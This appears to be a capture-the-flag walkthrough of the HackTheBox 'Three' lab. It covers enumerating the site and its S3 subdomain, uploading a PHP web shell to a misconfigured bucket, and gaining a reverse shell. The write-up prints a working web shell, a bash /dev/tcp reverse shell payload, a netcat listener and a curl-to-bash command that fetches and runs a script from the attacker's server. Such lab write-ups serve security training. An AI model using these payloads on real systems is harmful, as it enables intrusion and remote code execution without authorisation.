Three HTB walkthrough
Hey everyone !
I will cover solution steps of the “Three” machine, which is part of the ‘Starting Point’ labs and has a difficulty rating of ‘Very Easy’.
Now, navigate to Three machine challenge and download the VPN (.ovpn) configuration file and open a terminal window to run below mentioned command –
sudo openvpn [filename].ovpn
Note: [filename] should be replaced with the name of your downloaded .ovpn file for the Starting Point lab.
So, now let’s spawn the machine. And this is the interface that looks like after the machine gets spawned !!!
Task 1
How many TCP ports are open?
Ans: 2
Task 2
What is the domain of the email address provided in the “Contact” section of the website?
Ans: thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
Ans: etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
Ans: s3.thetoppers.htb
Task 5
Which service is running on the discovered sub-domain?
Ans: Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
Ans: awscli
Task 7
Which command is used to set up the AWS CLI installation?
Ans: aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
Ans: aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
Ans: php
Submit root flag:
First, I had to install awscli with the command apt install awscli
Next, we have to configure aws with aws configure
- we can set everything to temp
Next, we have to find out about the s3 buckets hosted by the server using the command from task 8.
- aws — endpoint=http://s3.thetoppers.htb s3 ls
We can find out the files listed through the command
- aws — endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
helpful link: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3
To get the files, we can copy them to a remote bucket. First, we need to create and upload a PHP shell to the s3 bucket.
I created the file using nano shell.php
Inside the file, I put <?php system($_GET[“cmd”]); ?>
- <?php is to specify the language being used
- $_GET is to get information
- [“cmd”] we get our information from the cmd parameter.
- ?> is to close
Next, we need to upload the shell.php to the website. We can do so with the following command
- aws — endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
- cp is to copy/upload shell.php
We can test if it works by going to http://thetoppers.htb/shell.php
We can try to run commands in the URL itself by going to http://thetoppers.htb/shell.php?cmd=whoami
The response from the website verifies that we have code execution.
The next step is to obtain a reverse shell.
STEPS TO OBTAIN A REVERSE SHELL
- Identify the IP address that you are on.
- from ifconfig
- we are looking for the tun0 address, which is the vpn that htb connects to.
- The ip address is 10.10.14.119
2. Create a new file called shell.sh
- the shell must contain a payload
- bash -i >& /dev/tcp/<your ip address>/1337 0>&1
- or you can go to https://www.revshells.com/ and create your own.
3. start a webserver
- python3 -m http.server 8080
4. start a listener
- nc -lvnp 1337
5. run http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash in the url.
- %20 is the url encoded version of space ( )
- 10.10.14.119 is your own url
- :8080 is the port it is running from.
- shell.sh is the payload that we have created just now.
- | is a pipe function. (ctrl +\)
- bash: take shell.sh and run it in a new bash instance.
6. The listener would have caught something.
In this case, we have access to the shell and we can try to find the root flag from here.
We can look through the directories to find our flag.txt, and voila!
